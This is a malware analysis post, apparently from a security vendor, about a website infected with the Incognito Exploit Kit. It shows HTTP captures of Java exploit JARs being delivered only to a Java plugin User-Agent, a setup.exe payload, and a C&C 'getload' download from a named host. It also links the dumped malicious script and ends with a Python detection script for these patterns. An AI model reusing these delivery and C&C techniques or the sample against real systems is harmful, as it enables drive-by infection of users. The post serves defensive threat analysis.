Preventsweating.com infected by Incognito Exploit Kit

Our honeypot has logged an infected website:

hxxp://www.preventsweating .com

The malicious JavaScript code is at the end of the page:

[Image: screenshot of the obfuscated JavaScript appended to the page]

Download dumped content (password is novirusthanks.org):
exploit.zip / 1 KB

We have analyzed the infected website with our sandbox. The network traffic shows that the obfuscated JavaScript code redirects users to the Incognito Exploit Kit URL, which exploits a Java vulnerability to infect the user's PC with the payload setup.exe.

The malicious Java file is downloaded:

GET /showthread.php?t=49281 HTTP/1.1
accept-encoding: pack200-gzip, gzip
content-type: application/x-java-archive
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_13
Host: pringcreek.osa .pl
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
 
 
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 30 Jan 2012 23:39:19 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Content-Length: 11864
Content-Disposition: inline; filename=e7246650.jar
 
PK........ΣΈ=@..

File details:

File: e7246650.jar
Size: 11864 bytes

Note that the .JAR file can be downloaded only when the request carries this User-Agent header:

User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_13

The payload is downloaded:

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 30 Jan 2012 23:39:21 GMT
Content-Type: application/octet-stream
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Accept-Ranges: bytes
Content-Transfer-Encoding: binary
Content-Length: 19968
Content-Disposition: inline; filename=setup.exe

File details:

File: setup.exe
Size: 19968 bytes

Another malicious Java file is downloaded:

GET /showthread.php?t=49281 HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_13
Host: pringcreek.osa .pl
Connection: keep-alive
 
 
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 30 Jan 2012 23:39:15 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Content-Length: 11864
Content-Disposition: inline; filename=7c11db5a.jar

File details:

File: 7c11db5a.jar
Size: 16412 bytes

Other HTTP GET requests:

GET /net.class HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_13
Host: pringcreek.osa .pl
 
GET /edu.class HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_13
Host: pringcreek.osa .pl
 
GET /com.class HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_13
Host: pringcreek.osa .pl

An executable file is downloaded (and executed) from the C&C server:

GET /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=0&sel=77777 HTTP/1.1
Host: hotlupdate .ru

HTTP/1.1 200 OK
Date: Mon, 30 Jan 2012 23:38:47 GMT
Server: Apache/2.2.21 (CentOS)
X-Powered-By: PHP/5.3.9
Cache-Control: public
Content-Disposition: attachment; filename=243
Content-Transfer-Encoding: binary
Content-Length: 218112
Connection: close
Content-Type: application/octet-stream

MZ
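The capture above shows three patterns a proxy or IDS can key on: the Java plugin's User-Agent fetching a JAR from a PHP script (the UA-gated delivery noted earlier), a script URL announcing setup.exe via Content-Disposition, and a cmd=getload beacon with a login token answered by an octet-stream body. The following Python is an added detection example, not code from the original post or from NoVirusThanks; the sample request/response pairs are constructed from the headers above (hosts defanged, and the payload's request line, which the capture does not show, replaced by a placeholder path).

```python
import re
from urllib.parse import parse_qs, urlsplit

def parse_http(raw):
    """Split a raw HTTP head into its start line and a lower-cased header dict."""
    start, *rest = raw.strip().splitlines()
    headers = {k.strip().lower(): v.strip() for k, v in (ln.split(":", 1) for ln in rest if ":" in ln)}
    return start, headers

def inspect(request_raw, response_raw):
    """Apply three rules to one request/response pair; return the triggered rule names."""
    req_line, req = parse_http(request_raw)
    _, resp = parse_http(response_raw)
    url = urlsplit(req_line.split()[1])
    query = parse_qs(url.query)
    ctype = resp.get("content-type", "").lower()
    match = re.search(r'filename="?([^";]+)', resp.get("content-disposition", ""))
    served = match.group(1).lower() if match else ""
    findings = []
    # Rule 1: the Java plugin's User-Agent fetching a PHP URL that hands back a JAR (UA-gated applet delivery).
    if (re.search(r"\bJava/\d", req.get("user-agent", "")) and url.path.endswith(".php")
            and ("java-archive" in ctype or served.endswith(".jar"))):
        findings.append("java-ua-jar-from-php")
    # Rule 2: a non-.exe URL announcing a Windows executable via Content-Disposition.
    if served.endswith(".exe") and not url.path.endswith(".exe"):
        findings.append("disguised-exe-download")
    # Rule 3: getload-style beacon with a login token answered by an octet-stream body.
    if "getload" in query.get("cmd", []) and "login" in query and "octet-stream" in ctype:
        findings.append("c2-getload-beacon")
    return findings

# Constructed sample pairs modelled on the captures in the post (hosts defanged;
# the payload's request line was not captured, so /placeholder.php stands in for it).
CAPTURES = {
    "jar": ("GET /showthread.php?t=49281 HTTP/1.1\nUser-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_13\nHost: pringcreek.osa[.]pl",
            "HTTP/1.1 200 OK\nContent-Type: application/java-archive\nContent-Disposition: inline; filename=e7246650.jar"),
    "payload": ("GET /placeholder.php HTTP/1.1\nUser-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_13\nHost: pringcreek.osa[.]pl",
                "HTTP/1.1 200 OK\nContent-Type: application/octet-stream\nContent-Disposition: inline; filename=setup.exe"),
    "c2": ("GET /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=0&sel=77777 HTTP/1.1\nHost: hotlupdate[.]ru",
           "HTTP/1.1 200 OK\nContent-Type: application/octet-stream\nContent-Disposition: attachment; filename=243"),
    "benign": ("GET /index.html HTTP/1.1\nUser-Agent: Mozilla/5.0\nHost: example.com",
               "HTTP/1.1 200 OK\nContent-Type: text/html"),
}

def scan(captures=CAPTURES):
    """Run inspect() over every labelled pair and return {label: [rule, ...]}."""
    return {label: inspect(req, resp) for label, (req, resp) in captures.items()}
```

Calling scan() flags each of the three malicious pairs with exactly one rule and leaves the benign pair empty; the same inspect() function can be fed request/response heads pulled from proxy logs or a PCAP.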
